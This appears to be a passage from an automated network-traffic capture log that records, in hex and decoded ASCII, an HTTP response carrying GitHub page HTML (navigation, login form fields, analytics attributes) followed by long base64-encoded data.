                                                                                              Data Ascii: con octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a
                                                                                              2022-08-10 04:47:36 UTC215INData Raw: 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 64 65 66 61 75 6c 74 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 61 6c 6c 20 6f 66 20 47 69 74 48 75 62 22 3e 0a 20 20 20 20 20 20 20 20 53 65 61 72 63 68 0a 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 67 6c 6f 62 61 6c 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 61 6c 6c 20 6f 66 20 47 69 74 48 75 62 22 3e 0a 20 20 20 20 20 20 20 20 41 6c 6c 20 47 69 74 48 75 62 0a 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70
                                                                                              Data Ascii: <span class="js-jump-to-badge-search-text-default d-none" aria-label="in all of GitHub"> Search </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <sp
                                                                                              2022-08-10 04:47:36 UTC217INData Raw: 35 2e 37 35 20 30 20 31 31 30 2d 31 2e 35 68 31 2e 37 35 76 2d 32 68 2d 38 61 31 20 31 20 30 20 30 30 2d 2e 37 31 34 20 31 2e 37 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 37 32 20 31 2e 30 35 41 32 2e 34 39 35 20 32 2e 34 39 35 20 30 20 30 31 32 20 31 31 2e 35 76 2d 39 7a 6d 31 30 2e 35 2d 31 56 39 68 2d 38 63 2d 2e 33 35 36 20 30 2d 2e 36 39 34 2e 30 37 34 2d 31 20 2e 32 30 38 56 32 2e 35 61 31 20 31 20 30 20 30 31 31 2d 31 68 38 7a 4d 35 20 31 32 2e 32 35 76 33 2e 32 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 34 2e 32 6c 31 2e 34 35 2d 31 2e 30 38 37 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 33 20 30 4c 38 2e 36 20 31 35 2e 37 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 34 2d 2e 32 76 2d 33 2e 32 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2d 2e 32 35
                                                                                              Data Ascii: 5.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25
                                                                                              2022-08-10 04:47:36 UTC218INData Raw: 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 61 76 61 74 61 72 20 6d 72 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 61 76 61 74 61 72 20 64 2d 6e 6f 6e 65 22 20 61 6c 74 3d 22 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 65 61 6d 22 20 73 72 63 3d 22 22 20 77 69 64 74 68 3d 22 32 38 22 20 68 65 69 67 68 74 3d 22 32 38 22 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 6e 61 6d 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 6e 61 6d 65 20 66 6c 65 78 2d 61 75 74 6f 20 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65
                                                                                              Data Ascii: ></path></svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidde
                                                                                              2022-08-10 04:47:36 UTC219INData Raw: 6c 69 6e 6b 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 68 79 64 72 6f 2d 63 6c 69 63 6b 3d 22 7b 26 71 75 6f 74 3b 65 76 65 6e 74 5f 74 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 2e 63 6c 69 63 6b 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 70 61 79 6c 6f 61 64 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 6c 6f 63 61 74 69 6f 6e 5f 69 6e 5f 70 61 67 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 73 69 74 65 20 68 65 61 64 65 72 20 6d 65 6e 75 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 72 65 70 6f 73 69 74 6f 72 79 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 2c 26 71 75 6f 74 3b 61 75 74 68 5f 74 79 70 65 26 71 75 6f 74 3b 3a 26 71 75
                                                                                              Data Ascii: link flex-shrink-0 no-underline" data-hydro-click="{&quot;event_type&quot;:&quot;authentication.click&quot;,&quot;payload&quot;:{&quot;location_in_page&quot;:&quot;site header menu&quot;,&quot;repository_id&quot;:null,&quot;auth_type&quot;:&qu
                                                                                              2022-08-10 04:47:36 UTC221INData Raw: 5f 7a 6b 69 46 77 53 38 4f 37 44 47 37 59 32 61 67 22 20 2f 3e 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 6c 6f 67 69 6e 5f 66 69 65 6c 64 22 3e 0a 20 20 20 20 55 73 65 72 6e 61 6d 65 20 6f 72 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 0a 20 20 3c 2f 6c 61 62 65 6c 3e 0a 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 22 20 69 64 3d 22 6c 6f 67 69 6e 5f 66 69 65 6c 64 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 20 69 6e 70 75 74 2d 62 6c 6f 63 6b 20 6a 73 2d 6c 6f 67 69 6e 2d 66 69 65 6c 64 22 20 61 75 74 6f 63 61 70 69 74 61 6c 69 7a 65 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 72 72 65 63 74 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 61 75 74
                                                                                              Data Ascii: _zkiFwS8O7DG7Y2ag" /> <label for="login_field"> Username or email address </label> <input type="text" name="login" id="login_field" class="form-control input-block js-login-field" autocapitalize="off" autocorrect="off" autocomplete="username" aut
                                                                                              2022-08-10 04:47:36 UTC222INData Raw: 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 74 69 6d 65 73 74 61 6d 70 22 20 76 61 6c 75 65 3d 22 31 36 36 30 31 30 36 38 35 36 31 34 39 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 74 69 6d 65 73 74 61 6d 70 5f 73 65 63 72 65 74 22 20 76 61 6c 75 65 3d 22 39 30 61 66 63 39 66 33 37 66 34 38 30 62 38 62 63 37 63 34 32 37 35 34 64 31 36 62 33 62 61 66 61 32 61 61 33 33 39 33 39 33 61 66 38 62 36 66 62 65 63 64 39 30 37 66 33 31 63 35 62 66 65 34 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d
                                                                                              Data Ascii: lass="form-control" /><input type="hidden" name="timestamp" value="1660106856149" autocomplete="off" class="form-control" /><input type="hidden" name="timestamp_secret" value="90afc9f37f480b8bc7c42754d16b3bafa2aa339393af8b6fbecd907f31c5bfe4" autocomplete=
                                                                                              2022-08-10 04:47:36 UTC223INData Raw: 61 74 61 2d 68 79 64 72 6f 2d 63 6c 69 63 6b 2d 68 6d 61 63 3d 22 37 36 35 32 36 31 61 30 61 30 62 63 66 62 34 33 64 32 64 37 66 31 65 32 31 65 35 36 35 36 33 34 62 31 39 32 38 30 36 35 33 31 63 32 38 36 35 36 34 37 36 31 31 39 64 35 36 65 62 63 38 36 65 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 53 69 67 6e 20 75 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 73 69 67 6e 20 75 70 20 66 6f 72 20 61 63 63 6f 75 6e 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67
                                                                                              Data Ascii: ata-hydro-click-hmac="765261a0a0bcfb43d2d7f1e21e565634b192806531c28656476119d56ebc86e0" data-analytics-event="{&quot;category&quot;:&quot;Sign up&quot;,&quot;action&quot;:&quot;click to sign up for account&quot;,&quot;label&quot;:&quot;ref_pag
                                                                                              2022-08-10 04:47:36 UTC225INData Raw: 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 6f 74 69 66 69 63 61 74 69 6f 6e 73 2f 62 65 74 61 2f 73 68 65 6c 66 22 3e 3c 2f 69 6e 63 6c 75 64 65 2d 66 72 61 67 6d 65 6e 74 3e 0a 0a 0a 0a 0a 0a 20 20 3c 64 69 76 0a 20 20 20 20 63 6c 61 73 73 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6d 61 69 6e 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 61 75 74 6f 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 22 0a 20 20 20 20 64 61 74 61 2d 63 6f 6d 6d 69 74 2d 68 6f 76 65 72 63 61 72 64 73 2d 65 6e 61 62 6c 65 64 0a 20 20 20 20 64 61 74 61 2d 64 69 73 63 75 73 73 69 6f 6e 2d 68 6f 76 65 72 63 61 72 64 73 2d 65 6e 61 62 6c 65 64 0a 20 20 20 20 64 61 74 61 2d 69 73 73 75 65 2d 61 6e 64 2d 70 72 2d 68 6f 76 65 72 63 61 72 64 73 2d 65 6e 61 62 6c 65 64 0a 20 20 3e 0a 20 20 20 20 20 20 20 20 3c
                                                                                              Data Ascii: github.com/notifications/beta/shelf"></include-fragment> <div class="application-main d-flex flex-auto flex-column" data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <
                                                                                              2022-08-10 04:47:36 UTC226INData Raw: 6f 55 77 73 43 71 47 41 48 5a 41 32 4a 51 4e 67 69 55 77 74 43 73 4b 5a 75 45 68 52 78 4b 49 4f 42 56 44 43 79 55 44 59 62 70 45 6f 34 71 70 54 59 69 45 42 78 34 53 42 73 55 49 49 73 4b 73 42 77 51 45 57 6f 55 63 56 59 67 34 71 52 52 78 34 56 54 4f 42 78 34 53 41 34 6f 72 59 63 49 67 34 49 4e 69 67 4f 4b 46 48 42 46 6f 34 48 5a 45 7a 6c 73 4f 45 77 5a 62 44 68 43 6a 68 77 70 56 48 44 6f 6c 50 69 32 41 52 47 2b 6d 46 61 4e 67 46 41 63 41 6c 47 77 43 55 62 45 62 42 41 63 52 73 68 79 74 69 67 32 50 43 69 68 69 71 59 62 42 4b 63 72 59 49 4e 67 6f 6f 59 42 45 59 32 4b 34 4d 35 44 42 51 62 42 46 44 45 39 55 49 32 4a 32 52 51 78 34 55 67 47 49 56 67 47 43 67 47 43 4b 42 39 4e 44 6e 44 36 61 49 33 30 79 70 6c 63 42 67 64 6c 46 70 63 46 55 44 42 52 57 50 70 71 4c
                                                                                              Data Ascii: oUwsCqGAHZA2JQNgiUwtCsKZuEhRxKIOBVDCyUDYbpEo4qpTYiEBx4SBsUIIsKsBwQEWoUcVYg4qRRx4VTOBx4SA4orYcIg4INigOKFHBFo4HZEzlsOEwZbDhCjhwpVHDolPi2ARG+mFaNgFAcAlGwCUbEbBAcRshytig2PCihiqYbBKcrYINgooYBEY2K4M5DBQbBFDE9UI2J2RQx4UgGIVgGCgGCKB9NDnD6aI30yplcBgdlFpcFUDBRWPpqL
                                                                                              2022-08-10 04:47:36 UTC227INData Raw: 4c 79 67 62 45 43 34 49 70 54 61 69 74 68 77 36 68 43 34 70 41 44 5a 78 33 55 55 75 42 56 43 2f 54 4b 6c 55 4d 44 75 6f 46 4e 6e 5a 46 4c 67 45 71 46 4e 67 32 55 55 70 73 55 55 68 74 62 51 64 55 69 6c 4e 6f 4b 67 51 32 49 70 44 59 6f 46 49 33 71 69 6c 77 66 71 67 51 32 6e 5a 52 53 6d 32 4a 55 69 30 68 73 55 35 7a 6d 49 66 54 4b 56 53 47 33 38 46 46 49 62 50 46 52 55 7a 59 50 76 51 4a 64 62 34 6c 52 53 59 36 4d 67 42 74 36 6c 52 70 4e 6a 52 43 46 49 31 31 55 4d 45 49 64 6f 37 49 75 45 38 66 42 42 35 72 54 31 31 58 62 44 67 6f 42 78 41 71 55 46 41 50 50 52 41 34 74 34 56 46 41 4e 6f 62 56 56 4b 63 42 45 4f 4c 55 51 34 74 56 49 63 57 79 68 7a 4b 43 78 71 6a 68 58 6e 54 6d 55 46 6f 30 43 73 51 34 74 64 42 51 57 74 79 72 45 7a 6b 77 74 2f 46 55 4f 4c 55 69 5a
                                                                                              Data Ascii: LygbEC4IpTaithw6hC4pADZx3UUuBVC/TKlUMDuoFNnZFLgEqFNg2UUpsUUhtbQdUilNoKgQ2IpDYoFI3qilwfqgQ2nZRSm2JUi0hsU5zmIfTKVSG38FFIbPFRUzYPvQJdb4lRSY6MgBt6lRpNjRCFI11UMEIdo7IuE8fBB5rT11XbDgoBxAqUFAPPRA4t4VFANobVVKcBEOLUQ4tVIcWyhzKCxqjhXnTmUFo0CsQ4tdBQWtyrEzkwt/FUOLUiZ
                                                                                              2022-08-10 04:47:36 UTC228INData Raw: 32 32 45 43 0d 0a 62 45 37 49 44 69 55 4f 52 73 55 67 32 50 73 79 44 59 6f 4e 69 55 4b 32 4a 51 48 45 37 49 56 73 54 73 66 42 43 74 67 64 6c 46 48 41 6f 6c 44 43 35 46 6f 2f 54 4b 49 32 43 69 35 62 42 55 72 59 38 49 67 59 6a 5a 52 52 78 2f 79 55 67 32 50 43 52 51 78 47 79 54 49 47 41 51 62 42 49 59 44 41 4a 41 4d 42 73 6d 54 41 59 63 4b 52 61 33 30 2b 45 4b 48 30 79 69 35 44 36 64 79 44 59 4a 7a 6e 4d 47 41 31 55 55 4d 41 69 55 44 36 59 55 71 68 39 50 68 41 75 48 43 4b 47 4b 67 42 74 52 53 34 38 49 6b 4b 62 51 70 79 71 42 73 37 70 56 4b 62 4f 43 67 55 32 48 5a 41 75 48 48 64 46 44 41 72 4b 30 70 39 4e 41 68 73 52 53 6d 79 73 4b 42 54 36 59 32 55 71 35 77 51 2b 6e 77 6f 70 44 5a 77 67 58 48 63 4b 4b 51 32 49 45 4e 71 4b 55 32 68 52 55 7a 5a 77 55 43 47 77
                                                                                              Data Ascii: 22ECbE7IDiUORsUg2PsyDYoNiUK2JQHE7IVsTsfBCtgdlFHAolDC5Fo/TKI2Ci5bBUrY8IgYjZRRx/yUg2PCRQxGyTIGAQbBIYDAJAMBsmTAYcKRa30+EKH0yi5D6dyDYJznMGA1UUMAiUD6YUqh9PhAuHCKGKgBtRS48IkKbQpyqBs7pVKbOCgU2HZAuHHdFDArK0p9NAhsRSmysKBT6Y2Uq5wQ+nwopDZwgXHcKKQ2IENqKU2hRUzZwUCGw
                                                                                              2022-08-10 04:47:36 UTC229INData Raw: 43 5a 74 64 51 54 75 73 4b 4b 6d 62 64 47 55 56 4d 32 4b 4b 58 45 37 49 50 4a 59 65 4b 37 59 63 4f 51 34 74 63 71 69 77 74 6f 6f 47 46 76 44 42 61 77 79 71 4c 65 79 43 6c 74 70 37 62 4b 70 68 57 32 31 2b 64 6b 46 42 61 74 59 77 7a 6c 51 57 46 43 71 43 7a 52 6b 53 34 4f 4c 46 55 71 6f 73 51 55 46 69 75 44 4b 67 73 54 43 5a 79 6f 4c 4f 46 55 4f 4c 4f 45 4b 63 57 44 5a 58 42 6b 34 74 34 56 6a 4a 78 59 67 63 57 67 61 49 55 34 74 47 79 49 59 57 75 68 6e 42 78 5a 77 71 68 78 59 67 59 57 38 4f 67 59 57 6e 5a 41 32 42 32 56 54 34 6e 48 70 37 70 55 48 42 43 6d 77 51 4d 4c 43 71 55 52 36 61 4a 54 44 30 77 67 59 57 44 5a 55 77 4f 49 32 55 67 5a 69 6b 42 78 4b 73 42 77 4b 49 62 42 46 48 42 51 4d 4c 65 46 59 6c 62 44 68 4d 47 63 6d 77 4f 79 66 45 2b 41 34 46 43 6a 67
                                                                                              Data Ascii: CZtdQTusKKmbdGUVM2KKXE7IPJYeK7YcOQ4tcqiwtooGFvDBawyqLeyCltp7bKphW21+dkFBatYwzlQWFCqCzRkS4OLFUqosQUFiuDKgsTCZyoLOFUOLOEKcWDZXBk4t4VjJxYgcWgaIU4tGyIYWuhnBxZwqhxYgYW8OgYWnZA2B2VT4nHp7pUHBCmwQMLCqUR6aJTD0wgYWDZUwOI2UgZikBxKsBwKIbBFHBQMLeFYlbDhMGcmwOyfE+A4FCjg
                                                                                              2022-08-10 04:47:36 UTC231INData Raw: 52 73 4f 41 6c 42 77 4b 56 52 77 35 52 4b 32 41 33 53 67 34 44 6c 51 6f 34 6a 5a 56 4b 32 49 32 55 79 75 47 59 62 4b 6f 7a 44 5a 52 57 62 68 41 57 34 51 5a 67 69 38 72 4d 69 4d 79 4b 32 49 56 52 6d 43 69 74 6a 31 51 48 48 68 42 73 46 49 74 62 36 5a 34 56 68 57 77 36 49 56 6a 36 61 46 62 42 49 55 4d 41 6f 72 59 42 56 47 77 34 43 41 59 6e 5a 52 57 59 68 45 5a 6c 4d 59 58 49 4d 68 47 59 4a 42 73 65 45 57 74 67 2b 6e 69 6f 42 39 50 68 44 47 51 50 70 2b 4f 69 4b 48 30 79 6f 74 4b 62 4e 79 67 47 43 44 59 68 51 67 59 44 5a 41 44 59 4e 6b 41 77 51 4b 62 4e 6c 47 69 59 6f 41 79 41 59 68 51 4c 68 77 71 46 77 4f 79 6a 52 54 5a 77 6f 70 54 59 64 55 51 75 43 4b 55 2b 6d 73 71 6d 66 54 56 6f 55 32 37 71 4b 51 32 42 51 71 5a 73 34 55 79 75 4d 6b 4e 71 69 6b 4e 76 43 47
                                                                                              Data Ascii: RsOAlBwKVRw5RK2A3Sg4DlQo4jZVK2I2UyuGYbKozDZRWbhAW4QZgi8rMiMyK2IVRmCitj1QHHhBsFItb6Z4VhWw6IVj6aFbBIUMAorYBVGw4CAYnZRWYhEZlMYXIMhGYJBseEWtg+nioB9PhDGQPp+OiKH0yotKbNygGCDYhQgYDZADYNkAwQKbNlGiYoAyAYhQLhwqFwOyjRTZwopTYdUQuCKU+msqmfTVoU27qKQ2BQqZs4UyuMkNqikNvCG
                                                                                              2022-08-10 04:47:36 UTC232INData Raw: 58 43 4a 74 55 79 70 4d 5a 55 48 6a 43 77 72 75 34 4b 69 78 74 56 61 6d 56 72 62 4e 30 46 68 61 65 79 75 45 79 74 62 59 4e 6c 55 56 74 74 66 6f 67 74 62 62 77 74 4d 71 43 31 55 56 46 71 49 71 4c 55 52 51 57 71 6d 56 42 5a 77 69 52 53 32 77 37 4b 6f 71 4c 47 30 52 44 69 77 6c 55 71 6c 76 70 71 6c 55 46 69 4a 61 59 57 6f 68 78 59 6f 70 78 59 46 55 4e 69 4e 67 69 47 41 56 68 54 43 30 37 49 55 34 73 51 4d 4c 65 45 51 32 50 43 41 73 69 77 63 56 55 68 73 56 51 77 73 34 68 51 48 44 68 58 6d 54 6e 4e 67 66 38 41 43 67 59 57 48 67 49 44 67 64 30 51 63 45 55 63 41 6b 42 46 6f 30 64 57 41 34 63 49 47 46 6e 43 41 69 31 45 6a 43 33 65 55 55 63 52 43 45 48 48 68 41 57 51 62 45 37 4b 56 52 78 4f 79 72 49 34 6c 53 71 32 4b 55 48 46 4b 4e 68 34 70 53 6a 69 4e 6c 4b 44 69
                                                                                              Data Ascii: XCJtUypMZUHjCwru4KixtVamVrbN0FhaeyuEytbYNlUVttfogtbbwtMqC1UVFqIqLURQWqmVBZwiRS2w7KoqLG0RDiwlUqlvpqlUFiJaYWohxYopxYFUNiNgiGAVhTC07IU4sQMLeEQ2PCAsiwcVUhsVQws4hQHDhXmTnNgf8ACgYWHgIDgd0QcEUcAkBFo0dWA4cIGFnCAi1EjC3eUUcRCEHHhAWQbE7KVRxOyrI4lSq2KUHFKNh4pSjiNlKDi
                                                                                              2022-08-10 04:47:36 UTC233INData Raw: 52 73 45 57 35 45 57 6f 4e 69 42 4c 6f 6e 4b 4f 4d 49 59 62 46 46 62 47 41 68 38 57 62 64 42 68 61 6b 4b 7a 46 42 6d 50 33 4b 4e 4d 78 56 52 73 53 47 52 57 5a 45 5a 6c 4d 72 68 6d 50 52 41 63 59 4b 71 4e 69 4e 67 67 47 41 52 57 77 64 51 6f 34 62 4b 31 41 4e 68 32 55 56 6d 62 52 57 70 47 5a 52 57 59 4b 51 42 6b 47 49 44 6f 59 77 32 49 56 41 78 35 55 55 47 4b 71 4d 33 43 45 42 6b 55 4d 65 36 55 41 32 2b 43 69 34 4c 6a 79 68 41 78 4f 33 64 41 47 4b 69 74 69 69 42 68 39 7a 71 4c 6e 4a 54 62 32 53 68 54 59 69 2f 37 69 34 71 4c 51 78 43 49 58 41 4b 4b 51 32 4b 42 54 59 69 6b 4e 71 45 4b 62 56 42 4d 32 70 56 69 5a 74 52 63 45 4e 71 67 6d 62 4e 6b 61 77 6b 62 57 55 69 31 4d 32 71 43 4e 31 71 4b 6b 62 56 46 52 75 74 55 68 55 72 72 56 46 52 75 74 52 55 62 72 56 46
                                                                                              Data Ascii: RsEW5EWoNiBLonKOMIYbFFbGAh8WbdBhakKzFBmP3KNMxVRsSGRWZEZlMrhmPRAcYKqNiNggGARWwdQo4bK1ANh2UVmbRWpGZRWYKQBkGIDoYw2IVAx5UUGKqM3CEBkUMe6UA2+Ci4LjyhAxO3dAGKitiiBh9zqLnJTb2ShTYi/7i4qLQxCIXAKKQ2KBTYikNqEKbVBM2pViZtRcENqgmbNkawkbWUi1M2qCN1qKkbVFRutUhUrrVFRutRUbrVF
                                                                                              2022-08-10 04:47:36 UTC235INData Raw: 51 34 74 2f 42 55 68 78 62 39 77 52 44 59 6f 6d 4d 48 46 75 79 4b 59 57 71 6f 4f 4f 36 42 68 62 73 69 47 46 69 55 45 57 69 59 5a 53 72 6b 63 55 42 59 4f 67 49 74 4b 71 51 32 49 31 4b 45 45 41 62 64 46 46 6a 49 47 62 68 56 42 46 70 51 79 32 4b 4b 4c 49 6b 46 6b 42 77 4f 79 41 34 46 41 63 41 68 7a 43 4c 52 73 68 7a 44 6a 39 36 69 69 79 71 4d 79 55 46 75 45 47 5a 42 6d 52 59 4c 56 53 49 7a 64 30 47 59 4b 6a 4d 6b 47 38 74 6c 46 62 68 41 56 52 70 51 5a 43 4d 79 44 4d 70 67 79 7a 62 53 68 42 5a 4b 52 6d 38 45 56 6d 61 71 56 4f 64 6d 38 45 47 62 56 54 6d 57 30 57 47 71 74 52 6d 2f 42 52 57 62 68 4b 43 78 32 56 52 6d 55 49 33 64 46 5a 43 43 68 47 52 49 7a 49 72 4d 70 42 75 69 6f 33 56 51 5a 41 4b 61 4b 4b 79 6f 4b 49 45 61 71 4b 7a 42 56 41 4e 76 4c 4b 4b 42 42
                                                                                              Data Ascii: Q4t/BUhxb9wRDYomMHFuyKYWqoOO6BhbsiGFiUEWiYZSrkcUBYOgItKqQ2I1KEEAbdFFjIGbhVBFpQy2KKLIkFkBwOyA4FAcAhzCLRshzDj96iiyqMyUFuEGZBmRYLVSIzd0GYKjMkG8tlFbhAVRpQZCMyDMpgyzbShBZKRm8EVmaqVOdm8EGbVTmW0WGqtRm/BRWbhKCx2VRmUI3dFZCChGRIzIrMpBuio3VQZAKaKKyoKIEaqKzBVANvLKKBB
                                                                                              2022-08-10 04:47:36 UTC236INData Raw: 62 39 43 4a 62 49 2b 72 66 38 50 54 64 54 50 37 67 65 58 59 2f 4c 74 4f 6a 48 69 58 48 32 4c 78 2b 66 6a 73 2b 6e 50 68 55 48 39 4c 50 35 67 66 2f 77 43 38 2f 62 77 4a 6e 36 6e 71 74 48 2f 5a 4c 6e 37 68 65 58 2f 4a 74 65 6a 54 34 33 54 30 48 78 33 7a 37 50 70 31 65 46 53 33 2b 6c 66 37 34 54 64 6e 2b 75 2f 51 57 67 4e 53 37 31 62 6e 66 2f 73 77 70 71 2f 63 50 67 66 68 73 39 70 30 61 66 46 6c 64 50 32 46 78 76 78 31 37 50 70 31 65 46 54 2b 31 58 37 79 42 2f 36 68 2b 69 50 51 2b 70 2f 6d 4c 50 75 48 77 65 37 32 6e 64 36 32 73 2f 59 50 47 62 7a 52 33 75 6f 77 2f 70 58 2b 37 76 38 41 4e 2b 34 2f 6f 37 52 6f 52 39 51 76 2f 77 43 77 46 4d 2f 75 4a 77 6e 77 32 57 76 75 39 61 34 2b 77 65 4c 2b 4f 30 30 64 37 71 56 2f 74 54 2b 35 6d 6e 37 6e 2b 6d 69 76 79 33 2b
                                                                                              Data Ascii: b9CJbI+rf8PTdTP7geXY/LtOjHiXH2Lx+fjs+nPhUH9LP5gf/wC8/bwJn6nqtH/ZLn7heX/JtejT43T0Hx3z7Pp1eFS3+lf74Tdn+u/QWgNS71bnf/swpq/cPgfhs9p0afFldP2Fxvx17Pp1eFT+1X7yB/6h+iPQ+p/mLPuHwe72nd62s/YPGbzR3uow/pX+7v8AN+4/o7RoR9Qv/wCwFM/uJwnw2Wvu9a4+weL+O00d7qV/tT+5mn7n+mivy3+
                                                                                              2022-08-10 04:47:36 UTC237INData Raw: 35 44 31 34 0d 0a 38 41 50 5a 2f 69 70 2f 61 6a 39 47 2f 2f 41 4b 74 36 31 50 38 41 34 56 76 32 72 48 75 4c 74 74 7a 70 36 63 39 54 66 74 2f 73 64 39 71 36 4d 64 59 6a 2b 6c 48 36 4e 32 50 37 76 36 34 66 2f 71 37 66 74 54 33 47 32 32 35 30 39 4f 65 6f 39 76 38 41 59 37 37 56 30 59 36 77 50 39 4b 76 30 51 4c 48 39 34 39 63 52 2f 38 41 43 74 66 33 70 37 6a 62 62 63 36 65 6e 50 55 65 33 2b 78 33 32 72 6f 78 31 72 66 32 71 2f 62 50 2f 77 42 6e 2b 71 64 74 72 50 63 79 35 2b 34 76 45 37 72 52 30 35 62 39 41 63 50 76 64 58 52 68 6a 2f 53 72 39 72 48 2f 41 4f 54 2f 41 46 56 57 66 47 7a 37 46 50 63 54 69 64 31 6f 36 63 72 36 41 34 62 65 36 2b 6a 44 66 32 70 2f 61 32 2f 39 55 2f 55 76 77 4c 4e 4f 79 65 34 6e 45 37 72 52 2b 50 57 65 67 4f 48 33 75 72 6f 77 70 62 2f
                                                                                              Data Ascii: 5D148APZ/ip/aj9G//AKt61P8A4Vv2rHuLttzp6c9Tft/sd9q6MdYj+lH6N2P7v64f/q7ftT3G22509Oeo9v8AY77V0Y6wP9Kv0QLH949cR/8ACtf3p7jbbc6enPUe3+x32rox1rf2q/bP/wBn+qdtrPcy5+4vE7rR05b9AcPvdXRhj/Sr9rH/AOT/AFVWfGz7FPcTid1o6cr6A4be6+jDf2p/a2/9U/UvwLNOye4nE7rR+PWegOH3urowpb/
